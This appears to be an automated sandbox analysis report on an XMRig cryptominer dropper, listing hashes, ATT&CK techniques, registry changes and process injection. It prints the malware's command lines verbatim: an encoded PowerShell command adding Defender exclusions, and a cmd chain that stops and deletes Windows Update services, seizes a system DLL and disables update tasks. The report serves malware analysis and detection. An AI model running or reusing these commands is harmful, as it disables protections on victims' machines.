xmrig | 1c135b72fe995cb7bea00a9d7c78e88be394834e2f831703c6170e7b3d430d84

Analysis

max time kernel
151s
max time network
145s
platform
windows10-2004_x64
resource
win10v2004-20220722-en
resource tags

arch:x64arch:x86image:win10v2004-20220722-enlocale:en-usos:windows10-2004-x64system
submitted
11-08-2022 23:03

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

c7ad8aff4b9bcaaf8362bc46dbb335bd.exe
Size

5.0MB
MD5

c7ad8aff4b9bcaaf8362bc46dbb335bd
SHA1

6da9bd46beba784cde7bce3d73963567c9efb9b0
SHA256

1c135b72fe995cb7bea00a9d7c78e88be394834e2f831703c6170e7b3d430d84
SHA512

e6d3f7e3e73f8445c8233202b143d5a932c7b6d0ee53c77de857a825db416bc0c73d32eaea6b7720af3ee582089dbe9071426dcbf2c02bd96e2db9ac379b0aa3

Score

10^/10

xmrig discovery evasion exploit miner

Malware Config

Signatures

Modifies security service 2 TTPs 5 IoCs

evasion

Modify Registry

T1112

Modify Existing Service

T1031

Processes:

reg.exe

description	ioc	process
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\0	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\1	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Parameters	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Security	reg.exe

xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

XMRig Miner payload 6 IoCs

miner

Processes:

resource	yara_rule
behavioral2/memory/444-215-0x0000000140000000-0x0000000140809000-memory.dmp	xmrig
behavioral2/memory/444-216-0x000000014036EAC4-mapping.dmp	xmrig
behavioral2/memory/444-217-0x0000000140000000-0x0000000140809000-memory.dmp	xmrig
behavioral2/memory/444-218-0x0000000140000000-0x0000000140809000-memory.dmp	xmrig
behavioral2/memory/444-231-0x0000000140000000-0x0000000140809000-memory.dmp	xmrig
behavioral2/memory/444-234-0x0000000140000000-0x0000000140809000-memory.dmp	xmrig

Executes dropped EXE 1 IoCs

Processes:

gsd5432.exe

pid process

1284 gsd5432.exe
Possible privilege escalation attempt 4 IoCs
exploit

Processes:

takeown.exeicacls.exetakeown.exeicacls.exe

pid process

3116 takeown.exe
4280 icacls.exe
616 takeown.exe
624 icacls.exe
Stops running service(s) 3 TTPs
evasion

Modify Existing Service
T1031

Impair Defenses
T1562

Service Stop
T1489

pid	process
1284	gsd5432.exe

pid	process
3116	takeown.exe
4280	icacls.exe
616	takeown.exe
624	icacls.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

c7ad8aff4b9bcaaf8362bc46dbb335bd.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-3463845317-933582289-45817732-1000\Control Panel\International\Geo\Nation	c7ad8aff4b9bcaaf8362bc46dbb335bd.exe

Modifies file permissions 1 TTPs 4 IoCs
discovery

File and Directory Permissions Modification
T1222

Processes:

icacls.exetakeown.exeicacls.exetakeown.exe

pid process

624 icacls.exe
3116 takeown.exe
4280 icacls.exe
616 takeown.exe

pid	process
624	icacls.exe
3116	takeown.exe
4280	icacls.exe
616	takeown.exe

Drops file in System32 directory 4 IoCs

Processes:

powershell.EXEpowershell.exegsd5432.exe

description	ioc	process
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.EXE
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log	powershell.EXE
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\gsd5432.exe.log	gsd5432.exe

Suspicious use of SetThreadContext 1 IoCs

Processes:

gsd5432.exe

description pid process target process

PID 1284 set thread context of 444 1284 gsd5432.exe svchost.exe

description	pid	process	target process
PID 1284 set thread context of 444	1284	gsd5432.exe	svchost.exe

Drops file in Program Files directory 3 IoCs

Processes:

powershell.exegsd5432.exe

description	ioc	process
File created	C:\Program Files\423553261-N52542-56FGSH\gsd5432.exe	powershell.exe
File opened for modification	C:\Program Files\423553261-N52542-56FGSH\gsd5432.exe	powershell.exe
File created	C:\Program Files\Google\Libs\WR64.sys	gsd5432.exe

Launches sc.exe 10 IoCs
Sc.exe is a Windows utlilty to control services on the system.

Processes:

sc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exe

pid process

1824 sc.exe
2488 sc.exe
4736 sc.exe
4764 sc.exe
1852 sc.exe
784 sc.exe
1540 sc.exe
3420 sc.exe
3692 sc.exe
3356 sc.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

pid	process
1824	sc.exe
2488	sc.exe
4736	sc.exe
4764	sc.exe
1852	sc.exe
784	sc.exe
1540	sc.exe
3420	sc.exe
3692	sc.exe
3356	sc.exe

Modifies data under HKEY_USERS 64 IoCs

Processes:

powershell.EXEgsd5432.exepowershell.exe

description	ioc	process
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	powershell.EXE
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	gsd5432.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	gsd5432.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	gsd5432.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"	powershell.EXE
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"	gsd5432.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs	powershell.EXE
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs	powershell.EXE
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	powershell.EXE
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	gsd5432.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs	powershell.exe

Modifies registry key 1 TTPs 18 IoCs

Modify Registry

T1112

Processes:

reg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exe

pid	process
3356	reg.exe
4268	reg.exe
4472	reg.exe
2396	reg.exe
908	reg.exe
392	reg.exe
4980	reg.exe
3412	reg.exe
1972	reg.exe
4620	reg.exe
2272	reg.exe
3832	reg.exe
3580	reg.exe
2056	reg.exe
2308	reg.exe
1972	reg.exe
2036	reg.exe
3472	reg.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

powershell.exec7ad8aff4b9bcaaf8362bc46dbb335bd.exepowershell.exepowershell.EXEpowershell.exegsd5432.exesvchost.exe

pid	process
2236	powershell.exe
2236	powershell.exe
4864	c7ad8aff4b9bcaaf8362bc46dbb335bd.exe
2200	powershell.exe
2200	powershell.exe
1296	powershell.EXE
1296	powershell.EXE
4252	powershell.exe
4252	powershell.exe
1284	gsd5432.exe
444	svchost.exe
444	svchost.exe
444	svchost.exe
444	svchost.exe
444	svchost.exe
444	svchost.exe
444	svchost.exe
444	svchost.exe
444	svchost.exe
444	svchost.exe
444	svchost.exe
444	svchost.exe
444	svchost.exe
444	svchost.exe
444	svchost.exe
444	svchost.exe
444	svchost.exe
444	svchost.exe
444	svchost.exe
444	svchost.exe
444	svchost.exe
444	svchost.exe
444	svchost.exe
444	svchost.exe
444	svchost.exe
444	svchost.exe
444	svchost.exe
444	svchost.exe
444	svchost.exe
444	svchost.exe
444	svchost.exe
444	svchost.exe
444	svchost.exe
444	svchost.exe
444	svchost.exe
444	svchost.exe
444	svchost.exe
444	svchost.exe
444	svchost.exe
444	svchost.exe
444	svchost.exe
444	svchost.exe
444	svchost.exe
444	svchost.exe
444	svchost.exe
444	svchost.exe
444	svchost.exe
444	svchost.exe
444	svchost.exe
444	svchost.exe
444	svchost.exe
444	svchost.exe
444	svchost.exe
444	svchost.exe

Suspicious behavior: LoadsDriver 1 IoCs

Processes:

pid process

644

pid	process
644

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

powershell.exec7ad8aff4b9bcaaf8362bc46dbb335bd.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exetakeown.exepowershell.exe

description	pid	process
Token: SeDebugPrivilege	2236	powershell.exe
Token: SeDebugPrivilege	4864	c7ad8aff4b9bcaaf8362bc46dbb335bd.exe
Token: SeShutdownPrivilege	4160	powercfg.exe
Token: SeCreatePagefilePrivilege	4160	powercfg.exe
Token: SeShutdownPrivilege	4484	powercfg.exe
Token: SeCreatePagefilePrivilege	4484	powercfg.exe
Token: SeShutdownPrivilege	1948	powercfg.exe
Token: SeCreatePagefilePrivilege	1948	powercfg.exe
Token: SeShutdownPrivilege	3668	powercfg.exe
Token: SeCreatePagefilePrivilege	3668	powercfg.exe
Token: SeTakeOwnershipPrivilege	3116	takeown.exe
Token: SeDebugPrivilege	2200	powershell.exe
Token: SeIncreaseQuotaPrivilege	2200	powershell.exe
Token: SeSecurityPrivilege	2200	powershell.exe
Token: SeTakeOwnershipPrivilege	2200	powershell.exe
Token: SeLoadDriverPrivilege	2200	powershell.exe
Token: SeSystemProfilePrivilege	2200	powershell.exe
Token: SeSystemtimePrivilege	2200	powershell.exe
Token: SeProfSingleProcessPrivilege	2200	powershell.exe
Token: SeIncBasePriorityPrivilege	2200	powershell.exe
Token: SeCreatePagefilePrivilege	2200	powershell.exe
Token: SeBackupPrivilege	2200	powershell.exe
Token: SeRestorePrivilege	2200	powershell.exe
Token: SeShutdownPrivilege	2200	powershell.exe
Token: SeDebugPrivilege	2200	powershell.exe
Token: SeSystemEnvironmentPrivilege	2200	powershell.exe
Token: SeRemoteShutdownPrivilege	2200	powershell.exe
Token: SeUndockPrivilege	2200	powershell.exe
Token: SeManageVolumePrivilege	2200	powershell.exe
Token: 33	2200	powershell.exe
Token: 34	2200	powershell.exe
Token: 35	2200	powershell.exe
Token: 36	2200	powershell.exe
Token: SeIncreaseQuotaPrivilege	2200	powershell.exe
Token: SeSecurityPrivilege	2200	powershell.exe
Token: SeTakeOwnershipPrivilege	2200	powershell.exe
Token: SeLoadDriverPrivilege	2200	powershell.exe
Token: SeSystemProfilePrivilege	2200	powershell.exe
Token: SeSystemtimePrivilege	2200	powershell.exe
Token: SeProfSingleProcessPrivilege	2200	powershell.exe
Token: SeIncBasePriorityPrivilege	2200	powershell.exe
Token: SeCreatePagefilePrivilege	2200	powershell.exe
Token: SeBackupPrivilege	2200	powershell.exe
Token: SeRestorePrivilege	2200	powershell.exe
Token: SeShutdownPrivilege	2200	powershell.exe
Token: SeDebugPrivilege	2200	powershell.exe
Token: SeSystemEnvironmentPrivilege	2200	powershell.exe
Token: SeRemoteShutdownPrivilege	2200	powershell.exe
Token: SeUndockPrivilege	2200	powershell.exe
Token: SeManageVolumePrivilege	2200	powershell.exe
Token: 33	2200	powershell.exe
Token: 34	2200	powershell.exe
Token: 35	2200	powershell.exe
Token: 36	2200	powershell.exe
Token: SeIncreaseQuotaPrivilege	2200	powershell.exe
Token: SeSecurityPrivilege	2200	powershell.exe
Token: SeTakeOwnershipPrivilege	2200	powershell.exe
Token: SeLoadDriverPrivilege	2200	powershell.exe
Token: SeSystemProfilePrivilege	2200	powershell.exe
Token: SeSystemtimePrivilege	2200	powershell.exe
Token: SeProfSingleProcessPrivilege	2200	powershell.exe
Token: SeIncBasePriorityPrivilege	2200	powershell.exe
Token: SeCreatePagefilePrivilege	2200	powershell.exe
Token: SeBackupPrivilege	2200	powershell.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

c7ad8aff4b9bcaaf8362bc46dbb335bd.execmd.execmd.execmd.exe

description	pid	process	target process
PID 4864 wrote to memory of 2236	4864	c7ad8aff4b9bcaaf8362bc46dbb335bd.exe	powershell.exe
PID 4864 wrote to memory of 2236	4864	c7ad8aff4b9bcaaf8362bc46dbb335bd.exe	powershell.exe
PID 4864 wrote to memory of 4112	4864	c7ad8aff4b9bcaaf8362bc46dbb335bd.exe	cmd.exe
PID 4864 wrote to memory of 4112	4864	c7ad8aff4b9bcaaf8362bc46dbb335bd.exe	cmd.exe
PID 4864 wrote to memory of 1548	4864	c7ad8aff4b9bcaaf8362bc46dbb335bd.exe	cmd.exe
PID 4864 wrote to memory of 1548	4864	c7ad8aff4b9bcaaf8362bc46dbb335bd.exe	cmd.exe
PID 4112 wrote to memory of 3692	4112	cmd.exe	sc.exe
PID 4112 wrote to memory of 3692	4112	cmd.exe	sc.exe
PID 4112 wrote to memory of 4764	4112	cmd.exe	sc.exe
PID 4112 wrote to memory of 4764	4112	cmd.exe	sc.exe
PID 1548 wrote to memory of 4160	1548	cmd.exe	powercfg.exe
PID 1548 wrote to memory of 4160	1548	cmd.exe	powercfg.exe
PID 1548 wrote to memory of 4484	1548	cmd.exe	powercfg.exe
PID 1548 wrote to memory of 4484	1548	cmd.exe	powercfg.exe
PID 4112 wrote to memory of 3356	4112	cmd.exe	sc.exe
PID 4112 wrote to memory of 3356	4112	cmd.exe	sc.exe
PID 4112 wrote to memory of 1852	4112	cmd.exe	sc.exe
PID 4112 wrote to memory of 1852	4112	cmd.exe	sc.exe
PID 1548 wrote to memory of 1948	1548	cmd.exe	powercfg.exe
PID 1548 wrote to memory of 1948	1548	cmd.exe	powercfg.exe
PID 4112 wrote to memory of 784	4112	cmd.exe	sc.exe
PID 4112 wrote to memory of 784	4112	cmd.exe	sc.exe
PID 1548 wrote to memory of 3668	1548	cmd.exe	powercfg.exe
PID 1548 wrote to memory of 3668	1548	cmd.exe	powercfg.exe
PID 4112 wrote to memory of 4472	4112	cmd.exe	reg.exe
PID 4112 wrote to memory of 4472	4112	cmd.exe	reg.exe
PID 4112 wrote to memory of 2056	4112	cmd.exe	reg.exe
PID 4112 wrote to memory of 2056	4112	cmd.exe	reg.exe
PID 4112 wrote to memory of 2308	4112	cmd.exe	reg.exe
PID 4112 wrote to memory of 2308	4112	cmd.exe	reg.exe
PID 4112 wrote to memory of 1972	4112	cmd.exe	reg.exe
PID 4112 wrote to memory of 1972	4112	cmd.exe	reg.exe
PID 4112 wrote to memory of 2396	4112	cmd.exe	reg.exe
PID 4112 wrote to memory of 2396	4112	cmd.exe	reg.exe
PID 4864 wrote to memory of 2200	4864	c7ad8aff4b9bcaaf8362bc46dbb335bd.exe	powershell.exe
PID 4864 wrote to memory of 2200	4864	c7ad8aff4b9bcaaf8362bc46dbb335bd.exe	powershell.exe
PID 4112 wrote to memory of 3116	4112	cmd.exe	takeown.exe
PID 4112 wrote to memory of 3116	4112	cmd.exe	takeown.exe
PID 4112 wrote to memory of 4280	4112	cmd.exe	icacls.exe
PID 4112 wrote to memory of 4280	4112	cmd.exe	icacls.exe
PID 4864 wrote to memory of 4956	4864	c7ad8aff4b9bcaaf8362bc46dbb335bd.exe	cmd.exe
PID 4864 wrote to memory of 4956	4864	c7ad8aff4b9bcaaf8362bc46dbb335bd.exe	cmd.exe
PID 4956 wrote to memory of 4752	4956	cmd.exe	choice.exe
PID 4956 wrote to memory of 4752	4956	cmd.exe	choice.exe
PID 4112 wrote to memory of 908	4112	cmd.exe	reg.exe
PID 4112 wrote to memory of 908	4112	cmd.exe	reg.exe
PID 4112 wrote to memory of 392	4112	cmd.exe	reg.exe
PID 4112 wrote to memory of 392	4112	cmd.exe	reg.exe
PID 4112 wrote to memory of 3832	4112	cmd.exe	reg.exe
PID 4112 wrote to memory of 3832	4112	cmd.exe	reg.exe
PID 4112 wrote to memory of 2036	4112	cmd.exe	reg.exe
PID 4112 wrote to memory of 2036	4112	cmd.exe	reg.exe
PID 4112 wrote to memory of 2420	4112	cmd.exe	schtasks.exe
PID 4112 wrote to memory of 2420	4112	cmd.exe	schtasks.exe
PID 4112 wrote to memory of 2124	4112	cmd.exe	schtasks.exe
PID 4112 wrote to memory of 2124	4112	cmd.exe	schtasks.exe
PID 4112 wrote to memory of 4976	4112	cmd.exe	schtasks.exe
PID 4112 wrote to memory of 4976	4112	cmd.exe	schtasks.exe
PID 4112 wrote to memory of 4092	4112	cmd.exe	schtasks.exe
PID 4112 wrote to memory of 4092	4112	cmd.exe	schtasks.exe
PID 4112 wrote to memory of 2432	4112	cmd.exe	schtasks.exe
PID 4112 wrote to memory of 2432	4112	cmd.exe	schtasks.exe
PID 4112 wrote to memory of 3772	4112	cmd.exe	schtasks.exe
PID 4112 wrote to memory of 3772	4112	cmd.exe	schtasks.exe

C:\Users\Admin\AppData\Local\Temp\c7ad8aff4b9bcaaf8362bc46dbb335bd.exe
"C:\Users\Admin\AppData\Local\Temp\c7ad8aff4b9bcaaf8362bc46dbb335bd.exe"
1⤵
- Checks computer location settings
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4864

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGUAdAAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZAAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABAACgAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBEAHIAaQB2AGUAKQAgADwAIwBiAGEAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAYgBoAGoAbwAjAD4A"
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2236

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
2⤵
- Suspicious use of WriteProcessMemory
PID:4112

C:\Windows\system32\sc.exe
sc stop UsoSvc
3⤵
- Launches sc.exe
PID:3692

C:\Windows\system32\sc.exe
sc stop WaaSMedicSvc
3⤵
- Launches sc.exe
PID:4764

C:\Windows\system32\sc.exe
sc stop wuauserv
3⤵
- Launches sc.exe
PID:3356

C:\Windows\system32\sc.exe
sc stop bits
3⤵
- Launches sc.exe
PID:1852

C:\Windows\system32\sc.exe
sc stop dosvc
3⤵
- Launches sc.exe
PID:784

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f
3⤵
- Modifies registry key
PID:4472

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f
3⤵
- Modifies registry key
PID:2056

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f
3⤵
- Modifies security service
- Modifies registry key
PID:2308

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f
3⤵
- Modifies registry key
PID:1972

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f
3⤵
- Modifies registry key
PID:2396

C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\WaaSMedicSvc.dll
3⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:3116

C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q
3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:4280

C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f
3⤵
- Modifies registry key
PID:908

C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f
3⤵
- Modifies registry key
PID:392

C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f
3⤵
- Modifies registry key
PID:3832

C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f
3⤵
- Modifies registry key
PID:2036

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE
